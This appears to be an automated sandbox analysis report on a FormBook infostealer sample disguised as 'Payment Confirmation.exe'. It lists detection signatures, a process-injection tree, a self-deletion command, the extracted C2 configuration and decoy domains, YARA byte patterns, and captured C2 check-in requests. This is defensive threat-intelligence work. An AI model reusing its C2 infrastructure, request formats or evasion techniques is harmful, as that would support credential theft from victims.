Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment Confirmation.exe

Overview

General Information

Sample Name:Payment Confirmation.exe
Analysis ID:502129
MD5:98ffc3c812e6cec919ebd286973e2002
SHA1:b0d1a65445a7923870ad23ec4d80f592e808c987
SHA256:014d0ece0d472eaea73698d634308303ddb9f227f39d339a66416c3cb744d2c1
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Payment Confirmation.exe (PID: 2244 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
    • Payment Confirmation.exe (PID: 5440 cmdline: 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: 98FFC3C812E6CEC919EBD286973E2002)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 1516 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 4852 cmdline: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x6af8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.1.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.1.Payment Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.1.Payment Confirmation.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        4.2.Payment Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.Payment Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment Confirmation.exeVirustotal: Detection: 24%Perma Link
          Source: Payment Confirmation.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: www.thesewhitevvalls.comVirustotal: Detection: 6%Perma Link
          Machine Learning detection for sampleShow sources
          Source: Payment Confirmation.exeJoe Sandbox ML: detected
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.msiexec.exe.49f796c.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.2.Payment Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.1.Payment Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Payment Confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00405E93 FindFirstFileA,FindClose,1_2_00405E93
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004054BD
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00402671 FindFirstFileA,1_2_00402671

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49810 -> 172.105.103.207:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49843 -> 134.122.133.171:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.91.80.182 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.lumberjackguitarloops.com
          Source: C:\Windows\explorer.exeDomain query: www.elliotpioneer.com
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeDomain query: www.chinaopedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.anadolu.academy
          Source: C:\Windows\explorer.exeDomain query: www.playstarexch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.210.5.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.altitudebc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.147.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.unasolucioendesa.com
          Source: C:\Windows\explorer.exeDomain query: www.atp-cayenne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.thesewhitevvalls.com/b2c0/
          Source: Joe Sandbox ViewASN Name: ASIANETGB ASIANETGB
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.206.159.80 52.206.159.80
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:21 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Wed, 13 Oct 2021 14:32:26 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:32:42 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
